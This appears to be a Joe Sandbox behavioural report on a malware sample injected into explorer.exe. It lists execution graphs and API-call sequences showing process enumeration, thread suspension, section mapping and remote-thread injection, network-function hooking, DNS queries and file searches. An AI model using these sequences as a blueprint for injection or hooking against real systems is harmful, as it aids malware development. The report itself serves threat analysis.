                                    Dynamic/Decrypted Code Coverage:23.1%
                                    Signature Coverage:0%
                                    Total number of Nodes:39
                                    Total number of Limit Nodes:4
                                    execution_graph 1525 ed5da 1526 ed614 1525->1526 1527 ed748 3 API calls 1526->1527 1528 ed6f8 1526->1528 1527->1528 1484 ed748 1486 ed74d 1484->1486 1485 ed835 LoadLibraryA 1485->1486 1486->1485 1488 ed884 VirtualProtect VirtualProtect 1486->1488 1490 ed879 1486->1490 1489 ed912 1488->1489 1489->1489 1514 ed637 1515 ed62e 1514->1515 1517 ed6f8 1515->1517 1518 ed748 1515->1518 1520 ed74d 1518->1520 1519 ed835 LoadLibraryA 1519->1520 1520->1519 1522 ed884 VirtualProtect VirtualProtect 1520->1522 1524 ed879 1520->1524 1523 ed912 1522->1523 1523->1523 1524->1517 1491 e4914 1505 e1d08 CreateToolhelp32Snapshot 1491->1505 1494 e1d08 5 API calls 1495 e4941 1494->1495 1496 e1d08 5 API calls 1495->1496 1497 e494d SleepEx 1496->1497 1512 e1838 1497->1512 1499 e4962 SHGetSpecialFolderPathW 1501 e49e0 1499->1501 1504 e497b 1499->1504 1500 e4a18 1501->1500 1502 e1eb4 FindFirstFileW FindFirstFileW 1501->1502 1502->1500 1503 e1eb4 FindFirstFileW FindFirstFileW 1503->1504 1504->1501 1504->1503 1506 e1d2c Process32First 1505->1506 1507 e1d7a 1505->1507 1508 e1d56 1506->1508 1507->1494 1509 e1d44 lstrcmpi 1508->1509 1510 e1d71 CloseHandle 1508->1510 1511 e1d5f Process32Next 1508->1511 1509->1508 1509->1511 1510->1507 1511->1508 1513 e1847 1512->1513

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_000E370C 6 Function_000E1A04 0->6 1 Function_000ECC0D 2 Function_000ED70A 3 Function_000E1D08 105 Function_000E1CD0 3->105 4 Function_000E1508 5 Function_000E5104 5->6 9 Function_000E2C00 5->9 26 Function_000E1C28 5->26 29 Function_000E3F20 5->29 32 Function_000E1838 5->32 33 Function_000E1938 5->33 61 Function_000E1B74 5->61 70 Function_000E1C80 5->70 85 Function_000E1CA0 5->85 95 Function_000E1BC8 5->95 107 Function_000E1BE8 5->107 7 Function_000E1405 8 Function_000E5300 8->5 8->8 8->32 73 Function_000E4C80 8->73 8->107 18 Function_000E2B14 9->18 99 Function_000E29C0 9->99 9->107 10 Function_000E1000 11 Function_000E4B1E 12 Function_000E311C 13 Function_000E211C 14 Function_000E141D 15 Function_000E3818 15->0 15->6 15->32 55 Function_000E1860 15->55 81 Function_000E3690 15->81 104 Function_000E18D0 15->104 108 Function_000E18E8 15->108 109 Function_000E21E4 15->109 16 Function_000ED416 17 Function_000E4914 17->3 17->32 17->55 90 Function_000E1EB4 17->90 19 Function_000E2214 19->32 20 Function_000E4C14 21 Function_000E4710 21->6 77 Function_000E4094 21->77 98 Function_000E3FC0 21->98 21->104 21->107 21->108 114 Function_000E3FF8 21->114 117 Function_000E3CF0 21->117 22 Function_000E2F10 22->32 23 Function_000E4B2E 24 Function_000E4C2E 25 Function_000ED42D 27 Function_000E3424 28 Function_000E1822 37 Function_000E3E4C 29->37 30 Function_000E343C 31 Function_000E3C3C 38 Function_000E3B48 31->38 44 Function_000E345C 31->44 31->108 34 Function_000E2838 35 Function_000ED637 40 Function_000ED748 35->40 36 Function_000E624F 37->32 37->55 38->22 57 Function_000E317C 38->57 39 Function_000E3048 39->32 40->2 41 Function_000E4C42 42 Function_000E4540 71 Function_000E4280 42->71 42->98 42->107 43 Function_000E4B5E 44->32 66 Function_000E188C 44->66 44->107 45 Function_000E4C5C 46 Function_000E1254 47 Function_000E2754 48 Function_000E4B6F 49 Function_000E156C 50 Function_000E2368 50->32 50->33 50->55 50->66 76 Function_000E2298 50->76 50->104 113 Function_000E18F8 50->113 51 Function_000E2964 74 Function_000E299C 51->74 52 Function_000ECD63 53 Function_000E3F60 53->19 53->55 63 Function_000E268C 53->63 53->108 54 Function_000E1560 55->107 56 Function_000ED57E 57->12 57->39 57->55 78 Function_000E3094 57->78 57->104 58 Function_000E277C 58->47 58->51 58->104 59 Function_000E4A7C 60 Function_000E1576 62 Function_000E628F 63->32 63->50 63->55 64 Function_000E1D8C 65 Function_000E1A8C 66->32 67 Function_000E3B8C 67->6 67->38 67->44 67->108 68 Function_000E2F88 69 Function_000E2F84 71->6 71->32 71->55 72 Function_000E4680 72->71 72->98 72->107 73->13 73->32 73->55 73->58 73->65 75 Function_000E3D9C 73->75 103 Function_000E28D4 73->103 73->107 77->6 77->32 77->55 77->114 78->32 78->55 78->68 79 Function_000ECD92 80 Function_000E3A90 80->19 80->55 80->63 80->108 81->6 82 Function_000E3CAC 82->44 83 Function_000E4AA9 84 Function_000E44A4 84->77 84->98 84->117 86 Function_000E4BA0 87 Function_000ED0BB 88 Function_000E4BB8 89 Function_000ECFB7 90->32 90->55 90->64 92 Function_000E1DB0 90->92 91 Function_000E14B2 92->32 92->55 92->64 92->90 93 Function_000E1FB0 94 Function_000E4BB0 96 Function_000ED4C4 97 Function_000ED0C3 100 Function_000ED5DA 100->40 101 Function_000E14D4 102 Function_000E1FD4 102->32 102->55 102->93 102->102 103->34 103->47 103->107 106 Function_000E72D0 110 Function_000ECCE2 111 Function_000E45E0 111->71 111->98 111->107 112 Function_000E35FC 112->55 112->107 114->6 115 Function_000E14F9 116 Function_000E3AF0 116->15 116->112 117->27 117->30 117->31 117->67 117->82 117->107 117->116

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 90 e1db0-e1e10 call e1838 FindFirstFileW 94 e1e8e-e1eb2 call e1860 90->94 95 e1e12-e1e17 90->95 97 e1e19-e1e25 call e1d8c 95->97 98 e1e73-e1e83 95->98 97->98 104 e1e27-e1e60 call e1838 call e1eb4 97->104 98->95 103 e1e85-e1e86 98->103 103->94 110 e1e6b-e1e6e call e1860 104->110 111 e1e62-e1e63 104->111 110->98 111->110
                                    APIs
                                    • FindFirstFileW.KERNELBASE ref: 000E1E03
                                      • Part of subcall function 000E1EB4: FindFirstFileW.KERNELBASE ref: 000E1F05
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                    Similarity
                                    • API ID: FileFindFirst
                                    • String ID:
                                    • API String ID: 1974802433-0
                                    • Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                    • Instruction ID: f38ae4037610437375f10b6af05255b121b6e9b397242c6b965d87fbfa301cc4
                                    • Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                    • Instruction Fuzzy Hash: A9218F3021CE484FDB98EB2DA8992ED77D1EB98350F40066DF98ED3296DE3899058785

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 113 e1eb4-e1f12 call e1db0 call e1838 FindFirstFileW 119 e1f8f-e1faf call e1860 113->119 120 e1f14-e1f19 113->120 122 e1f1b-e1f27 call e1d8c 120->122 123 e1f74-e1f84 120->123 122->123 129 e1f29-e1f53 call e1838 122->129 123->120 128 e1f86-e1f87 123->128 128->119 133 e1f55-e1f5b 129->133 134 e1f63-e1f6f call e1860 129->134 133->134 134->123
                                    APIs
                                      • Part of subcall function 000E1DB0: FindFirstFileW.KERNELBASE ref: 000E1E03
                                    • FindFirstFileW.KERNELBASE ref: 000E1F05
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                    Similarity
                                    • API ID: FileFindFirst
                                    • String ID:
                                    • API String ID: 1974802433-0
                                    • Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                    • Instruction ID: 47430f8b37c49c67edc128d8763d7eb6b8b0d83c5ce7b1bd90213d5e2d146c9d
                                    • Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                    • Instruction Fuzzy Hash: 1521217020CA484FDF44FF2998997ED77E1EBA8344F00066DE55AD3292DF38D9448785

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 137 e5300-e5310 call e1be8 140 e5312-e5345 call e1838 137->140 141 e5390-e5395 137->141 145 e5347 call e1838 140->145 146 e5371-e538a NtUnmapViewOfSection 140->146 150 e534c-e5365 145->150 147 e539c-e53ab call e5104 146->147 148 e538c-e538e 146->148 156 e53ad-e53b0 call e5300 147->156 157 e53b5-e53be 147->157 148->141 151 e5396-e539b call e4c80 148->151 150->146 151->147 156->157
                                    APIs
                                    • NtUnmapViewOfSection.NTDLL ref: 000E5378
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                    Similarity
                                    • API ID: SectionUnmapView
                                    • String ID:
                                    • API String ID: 498011366-0
                                    • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                    • Instruction ID: bd129d4dbaa6a4f5a0d3126f6d5f59154c7ee90844e48c327c9209267a2d9f65
                                    • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                    • Instruction Fuzzy Hash: 1411C630601D894FEB9DF7BA58992B933D5EB58306F64093AE415D72A6DE798B808300

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                    • String ID:
                                    • API String ID: 868014591-0
                                    • Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                    • Instruction ID: 0459a99c9ea60d1701a80b016c2f68b58b576c4bcdc1a58c2692bd300445daa6
                                    • Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                    • Instruction Fuzzy Hash: F5018F30208A088FD755EB29DC883EE76E2FBD8314F000A2DA15AD2194DB3889458B45

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 9 ed748-ed74b 10 ed755-ed759 9->10 11 ed75b-ed763 10->11 12 ed765 10->12 11->12 13 ed74d-ed753 12->13 14 ed767 12->14 13->10 15 ed76a-ed771 14->15 17 ed77d 15->17 18 ed773-ed77b 15->18 17->15 19 ed77f-ed782 17->19 18->17 20 ed797-ed7a4 19->20 21 ed784-ed792 19->21 31 ed7be-ed7cc call ed70a 20->31 32 ed7a6-ed7a8 20->32 22 ed7ce-ed7e9 21->22 23 ed794-ed795 21->23 25 ed81a-ed81d 22->25 23->20 26 ed81f-ed820 25->26 27 ed822-ed829 25->27 29 ed801-ed805 26->29 30 ed82f-ed833 27->30 33 ed7eb-ed7ee 29->33 34 ed807-ed80a 29->34 35 ed884-ed88d 30->35 36 ed835-ed84e LoadLibraryA 30->36 31->10 38 ed7ab-ed7b2 32->38 33->27 42 ed7f0 33->42 34->27 39 ed80c-ed810 34->39 37 ed890-ed899 35->37 41 ed84f-ed856 36->41 43 ed8be-ed90e VirtualProtect * 2 37->43 44 ed89b-ed89d 37->44 55 ed7bc 38->55 56 ed7b4-ed7ba 38->56 45 ed812-ed819 39->45 46 ed7f1-ed7f5 39->46 41->30 48 ed858-ed86e 41->48 42->46 53 ed912-ed917 43->53 50 ed89f-ed8ae 44->50 51 ed8b0-ed8bc 44->51 45->25 46->29 49 ed7f7-ed7f9 46->49 60 ed879-ed883 48->60 61 ed870-ed877 48->61 49->29 54 ed7fb-ed7ff 49->54 50->37 51->50 53->53 57 ed919-ed928 53->57 54->29 54->34 55->31 55->38 56->55 61->41
                                    APIs
                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 000ED847
                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 000ED8E5
                                    • VirtualProtect.KERNELBASE ref: 000ED903
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.545405224.00000000000EC000.00000040.80000000.00040000.00000000.sdmp, Offset: 000EC000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_ec000_explorer.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$LibraryLoad
                                    • String ID:
                                    • API String ID: 895956442-0
                                    • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                    • Instruction ID: d53d9f834d506e3d4ff3502a79634dc9814ab7a84ab47d8519c68a9da176717b
                                    • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                    • Instruction Fuzzy Hash: 1D51893236899D0FDB28AB3D9CC43F9B7D1F759325B58063BC4DAD3285EA58C8468381

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000E1D08: CreateToolhelp32Snapshot.KERNEL32 ref: 000E1D1D
                                      • Part of subcall function 000E1D08: Process32First.KERNEL32 ref: 000E1D3C
                                      • Part of subcall function 000E1D08: CloseHandle.KERNELBASE ref: 000E1D74
                                      • Part of subcall function 000E1D08: lstrcmpi.KERNEL32 ref: 000E1D4C
                                      • Part of subcall function 000E1D08: Process32Next.KERNEL32 ref: 000E1D67
                                    • SleepEx.KERNEL32 ref: 000E4952
                                    • SHGetSpecialFolderPathW.SHELL32 ref: 000E4971
                                      • Part of subcall function 000E1EB4: FindFirstFileW.KERNELBASE ref: 000E1F05
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                    Similarity
                                    • API ID: FirstProcess32$CloseCreateFileFindFolderHandleNextPathSleepSnapshotSpecialToolhelp32lstrcmpi
                                    • String ID:
                                    • API String ID: 545558411-0
                                    • Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                    • Instruction ID: e07034320e4124c1100b8544608d92791e203ec77738bbdf640551667e09771c
                                    • Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                    • Instruction Fuzzy Hash: B131D53160CA488FDB59FF69E8995EE73E2FB98301F10462EE44BD3262DE34994187C0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 87 e1b74-e1b94 OpenFileMappingA 88 e1b96-e1bb4 MapViewOfFile 87->88 89 e1bb7-e1bc4 87->89 88->89
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.545405224.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_e1000_explorer.jbxd
                                    Similarity
                                    • API ID: File$MappingOpenView
                                    • String ID:
                                    • API String ID: 3439327939-0
                                    • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                    • Instruction ID: e5abea98356b676f12dbf069f3b67b236b1c676cd93db27c88262866e7ab4d0c
                                    • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                    • Instruction Fuzzy Hash: 77F08C34318F094FAB44EF7C9C8C536B7E0EBA8202B008A7EA84AC7164EF34C8808701

                                    Execution Graph

                                    Execution Coverage:10.3%
                                    Dynamic/Decrypted Code Coverage:97.4%
                                    Signature Coverage:0%
                                    Total number of Nodes:306
                                    Total number of Limit Nodes:42
                                    execution_graph 707 87728 708 87904 707->708 709 8774b 707->709 708->708 710 8785a LoadLibraryA 709->710 714 8789f VirtualProtect VirtualProtect 709->714 711 87871 710->711 711->709 713 87883 GetProcAddress 711->713 713->711 715 87899 713->715 714->708 991 8245e lstrlen 992 824a5 991->992 993 82476 CryptBinaryToStringA 991->993 993->992 994 82489 993->994 997 82861 GetProcessHeap RtlAllocateHeap 994->997 996 82494 CryptBinaryToStringA 996->992 997->996 716 81000 717 81010 716->717 718 81007 716->718 720 81016 718->720 769 82608 VirtualQuery 720->769 723 81097 723->717 725 8102c RtlMoveMemory 726 8104d 725->726 727 81071 NtUnmapViewOfSection GetCurrentProcessId 725->727 806 82861 GetProcessHeap RtlAllocateHeap 726->806 729 8109e 727->729 730 81092 727->730 772 810a4 729->772 730->723 731 81095 730->731 807 81332 731->807 733 81052 RtlMoveMemory 733->727 734 810a3 736 82861 GetProcessHeap RtlAllocateHeap 734->736 737 810cc 736->737 738 810dc CreateToolhelp32Snapshot 737->738 739 810f0 Process32First 738->739 740 81322 Sleep 738->740 741 8131b CloseHandle 739->741 742 8110c lstrcmpi 739->742 740->738 741->740 743 81124 lstrcmpi 742->743 765 81280 742->765 745 81138 lstrcmpi 743->745 743->765 744 825ad OpenProcess IsWow64Process IsWow64Process CloseHandle 744->765 746 8114c lstrcmpi 745->746 745->765 747 81160 lstrcmpi 746->747 746->765 749 81170 lstrcmpi 747->749 747->765 748 81305 Process32Next 748->742 750 81319 748->750 751 81184 lstrcmpi 749->751 749->765 750->741 752 81198 lstrcmpi 751->752 751->765 753 811ac lstrcmpi 752->753 752->765 754 811c0 lstrcmpi 753->754 753->765 755 811d4 lstrcmpi 754->755 754->765 756 811e8 lstrcmpi 755->756 755->765 758 811fc lstrcmpi 756->758 756->765 757 82608 VirtualQuery 757->765 759 8120c lstrcmpi 758->759 758->765 761 8121c lstrcmpi 759->761 759->765 760 812ae lstrcmpi 760->765 762 8122c lstrcmpi 761->762 761->765 763 8123c lstrcmpi 762->763 762->765 763->765 766 8124c lstrcmpi 763->766 764 81819 30 API calls 764->765 765->744 765->748 765->757 765->760 765->764 766->765 767 8125c lstrcmpi 766->767 767->765 768 8126c lstrcmpi 767->768 768->748 768->765 770 8101e 769->770 770->723 771 82861 GetProcessHeap RtlAllocateHeap 770->771 771->725 834 82861 GetProcessHeap RtlAllocateHeap 772->834 774 810cc 775 810dc CreateToolhelp32Snapshot 774->775 776 810f0 Process32First 775->776 777 81322 Sleep 775->777 778 8131b CloseHandle 776->778 779 8110c lstrcmpi 776->779 777->775 778->777 780 81124 lstrcmpi 779->780 790 81280 779->790 782 81138 lstrcmpi 780->782 780->790 783 8114c lstrcmpi 782->783 782->790 784 81160 lstrcmpi 783->784 783->790 786 81170 lstrcmpi 784->786 784->790 785 81305 Process32Next 785->779 787 81319 785->787 788 81184 lstrcmpi 786->788 786->790 787->778 789 81198 lstrcmpi 788->789 788->790 789->790 791 811ac lstrcmpi 789->791 790->785 795 82608 VirtualQuery 790->795 798 812ae lstrcmpi 790->798 835 825ad OpenProcess 790->835 841 81819 790->841 791->790 792 811c0 lstrcmpi 791->792 792->790 793 811d4 lstrcmpi 792->793 793->790 794 811e8 lstrcmpi 793->794 794->790 796 811fc lstrcmpi 794->796 795->790 796->790 797 8120c lstrcmpi 796->797 797->790 799 8121c lstrcmpi 797->799 798->790 799->790 800 8122c lstrcmpi 799->800 800->790 801 8123c lstrcmpi 800->801 801->790 803 8124c lstrcmpi 801->803 803->790 804 8125c lstrcmpi 803->804 804->790 805 8126c lstrcmpi 804->805 805->785 805->790 806->733 887 82861 GetProcessHeap RtlAllocateHeap 807->887 809 81340 GetModuleFileNameA 888 82861 GetProcessHeap RtlAllocateHeap 809->888 811 81357 GetCurrentProcessId wsprintfA 889 8263e CryptAcquireContextA 811->889 814 8139c Sleep 894 824d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 814->894 815 8140d 912 82843 815->912 818 813ae GetModuleHandleA GetProcAddress 820 813c9 818->820 821 813da GetModuleHandleA GetProcAddress 818->821 902 81de3 820->902 824 813f5 821->824 825 81406 821->825 822 82843 3 API calls 826 8141b RtlExitUserThread 822->826 827 81de3 3 API calls 824->827 828 824d5 10 API calls 825->828 829 81425 826->829 827->825 828->815 830 82608 VirtualQuery 829->830 832 8144b 829->832 831 8143a 830->831 831->832 917 81493 831->917 832->729 834->774 836 825cb IsWow64Process 835->836 837 82600 835->837 838 825dc IsWow64Process 836->838 839 825ee 836->839 837->790 838->839 840 825f9 CloseHandle 838->840 839->840 840->837 842 82608 VirtualQuery 841->842 843 81833 842->843 844 81845 OpenProcess 843->844 845 81a76 843->845 844->845 846 8185e 844->846 845->790 847 82608 VirtualQuery 846->847 848 81865 847->848 848->845 849 8188f 848->849 850 81873 NtSetInformationProcess 848->850 872 81a80 849->872 850->849 853 81a80 2 API calls 854 818d6 853->854 855 81a73 CloseHandle 854->855 856 81a80 2 API calls 854->856 855->845 857 81900 856->857 878 81b17 857->878 860 81a80 2 API calls 861 81930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 860->861 862 81a4e CreateRemoteThread 861->862 863 81985 861->863 864 81a65 CloseHandle 862->864 865 8198b CreateMutexA GetLastError 863->865 868 819bb GetModuleHandleA GetProcAddress ReadProcessMemory 863->868 866 81a67 CloseHandle CloseHandle 864->866 865->863 867 819a7 CloseHandle Sleep 865->867 866->855 867->865 869 819ec WriteProcessMemory 868->869 870 81a47 868->870 869->870 871 81a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 869->871 870->864 870->866 871->870 873 81a94 872->873 875 818b4 872->875 874 81aa4 NtCreateSection 873->874 876 81ac3 873->876 874->876 875->853 876->875 877 81ad8 NtMapViewOfSection 876->877 877->875 879 81b2e 878->879 885 81b60 878->885 880 81b30 RtlMoveMemory 879->880 880->880 880->885 881 81bc3 882 81910 NtUnmapViewOfSection 881->882 884 81be1 LdrProcessRelocationBlock 881->884 882->860 883 81b71 LoadLibraryA 883->882 883->885 884->881 884->882 885->881 885->883 886 81ba1 GetProcAddress 885->886 886->882 886->885 887->809 888->811 890 81384 CreateMutexA GetLastError 889->890 891 82664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 889->891 890->814 890->815 892 826aa wsprintfA 891->892 892->892 893 826cc CryptDestroyHash CryptReleaseContext 892->893 893->890 895 82515 894->895 896 82565 CloseHandle 895->896 897 82555 Thread32Next 895->897 898 82521 OpenThread 895->898 896->818 897->895 899 8253c SuspendThread 898->899 900 82544 ResumeThread 898->900 901 8254a CloseHandle 899->901 900->901 901->897 903 81ded 902->903 911 81e56 902->911 903->911 944 81e93 VirtualProtect 903->944 905 81e04 905->911 945 82815 VirtualAlloc 905->945 907 81e10 908 81e1a RtlMoveMemory 907->908 910 81e2d 907->910 908->910 946 81e93 VirtualProtect 910->946 911->821 913 82608 VirtualQuery 912->913 914 8284b 913->914 915 81414 914->915 916 8284f GetProcessHeap HeapFree 914->916 915->822 916->915 918 814c0 917->918 919 814a1 917->919 921 814c8 918->921 922 81510 918->922 947 817c7 919->947 924 817c7 5 API calls 921->924 940 814b6 921->940 966 826e6 lstrlen lstrlen 922->966 926 814e0 924->926 926->940 954 81647 926->954 927 8155f 928 826e6 2 API calls 927->928 931 8156c 928->931 930 81532 968 81752 GetModuleHandleA GetProcAddress 930->968 933 815a0 931->933 934 81584 931->934 931->940 938 82404 5 API calls 933->938 933->940 971 82404 lstrlen 934->971 941 815ac 938->941 939 81647 11 API calls 939->940 940->832 941->940 942 81647 11 API calls 941->942 943 814fb 942->943 943->940 977 815e0 943->977 944->905 945->907 946->911 948 817d1 947->948 951 81812 947->951 949 826e6 2 API calls 948->949 948->951 950 817f1 949->950 950->951 982 82861 GetProcessHeap RtlAllocateHeap 950->982 951->940 953 81804 RtlMoveMemory 953->951 955 81660 954->955 965 81745 954->965 956 81671 lstrlen 955->956 955->965 957 81683 lstrlen 956->957 956->965 958 81690 getpeername 957->958 957->965 959 816ae inet_ntoa htons 958->959 958->965 963 816cc 959->963 959->965 961 81717 wsprintfA 962 8173a 961->962 964 82843 3 API calls 962->964 962->965 963->965 983 82861 GetProcessHeap RtlAllocateHeap 963->983 964->965 965->943 967 8151d 966->967 967->927 967->930 969 81539 968->969 970 81776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 968->970 969->939 969->940 970->969 972 8241c CryptStringToBinaryA 971->972 973 82456 971->973 972->973 974 82438 972->974 973->940 984 82861 GetProcessHeap RtlAllocateHeap 974->984 976 82444 CryptStringToBinaryA 976->973 978 82843 3 API calls 977->978 979 815f5 978->979 980 82843 3 API calls 979->980 981 815fc 980->981 981->940 982->953 983->961 984->976 998 81425 999 8144b 998->999 1000 81432 998->1000 1001 82608 VirtualQuery 1000->1001 1002 8143a 1001->1002 1002->999 1003 81493 23 API calls 1002->1003 1003->999 1004 82806 VirtualFree 1005 81eb6 1006 81ed9 1005->1006 1007 81ecc lstrlen 1005->1007 1016 82861 GetProcessHeap RtlAllocateHeap 1006->1016 1007->1006 1009 81ee1 lstrcat 1010 81f1d 1009->1010 1011 81f16 lstrcat 1009->1011 1017 81f4a 1010->1017 1011->1010 1014 82843 3 API calls 1015 81f40 1014->1015 1016->1009 1051 822b8 1017->1051 1021 81f77 1056 827e2 lstrlen MultiByteToWideChar 1021->1056 1023 81f86 1057 82374 RtlZeroMemory 1023->1057 1026 81fd8 RtlZeroMemory 1028 8200d 1026->1028 1027 82843 3 API calls 1029 81f2d 1027->1029 1032 8229a 1028->1032 1034 8203b 1028->1034 1059 822e5 1028->1059 1029->1014 1031 82280 1031->1032 1033 82843 3 API calls 1031->1033 1032->1027 1033->1032 1034->1031 1068 82861 GetProcessHeap RtlAllocateHeap 1034->1068 1036 8210b wsprintfW 1037 82131 1036->1037 1041 8219e 1037->1041 1069 82861 GetProcessHeap RtlAllocateHeap 1037->1069 1039 8216b wsprintfW 1039->1041 1040 8225d 1042 82843 3 API calls 1040->1042 1041->1040 1070 82861 GetProcessHeap RtlAllocateHeap 1041->1070 1044 82271 1042->1044 1044->1031 1045 82843 3 API calls 1044->1045 1045->1031 1046 821e9 1047 82256 1046->1047 1071 82815 VirtualAlloc 1046->1071 1049 82843 3 API calls 1047->1049 1049->1040 1050 82243 RtlMoveMemory 1050->1047 1052 81f69 1051->1052 1053 822c2 1051->1053 1055 82861 GetProcessHeap RtlAllocateHeap 1052->1055 1054 826e6 2 API calls 1053->1054 1054->1052 1055->1021 1056->1023 1058 81f96 1057->1058 1058->1026 1058->1032 1061 822f2 1059->1061 1062 82353 1059->1062 1060 822f6 DnsQuery_W 1060->1061 1061->1060 1061->1062 1063 82335 DnsFree inet_ntoa 1061->1063 1062->1034 1063->1061 1064 82355 1063->1064 1072 82861 GetProcessHeap RtlAllocateHeap 1064->1072 1066 8235f 1073 827e2 lstrlen MultiByteToWideChar 1066->1073 1068->1036 1069->1039 1070->1046 1071->1050 1072->1066 1073->1062

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_00082608 1 Function_00081F4A 7 Function_00082843 1->7 21 Function_00082815 1->21 30 Function_00082861 1->30 31 Function_000827E2 1->31 35 Function_000822E5 1->35 37 Function_000822B8 1->37 39 Function_00082731 1->39 42 Function_00082374 1->42 2 Function_00081A80 3 Function_00081DC0 13 Function_00081C19 3->13 4 Function_00081D80 4->13 5 Function_00081000 22 Function_00081016 5->22 6 Function_00082841 7->0 8 Function_00082404 8->30 9 Function_00082806 10 Function_00081647 10->7 28 Function_000824AE 10->28 10->30 11 Function_000817C7 11->30 36 Function_000826E6 11->36 12 Function_00081819 12->0 12->2 23 Function_00081B17 12->23 14 Function_00081E5D 14->4 15 Function_0008245E 15->30 16 Function_00082592 17 Function_00081752 18 Function_00081493 18->8 18->10 18->11 18->17 29 Function_000815E0 18->29 18->36 19 Function_00081E93 20 Function_000824D5 22->0 22->12 22->16 27 Function_000825AD 22->27 22->30 33 Function_000810A4 22->33 22->39 40 Function_00081332 22->40 41 Function_00082573 22->41 24 Function_00083417 25 Function_00087728 26 Function_00081469 26->0 26->18 29->7 32 Function_00081DE3 32->3 32->14 32->19 32->21 33->0 33->12 33->16 33->27 33->30 33->39 33->41 34 Function_00081425 34->0 34->18 35->30 35->31 37->36 38 Function_0008263E 40->0 40->7 40->18 40->20 40->30 40->32 40->38 43 Function_00081EB6 43->1 43->7 43->30

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
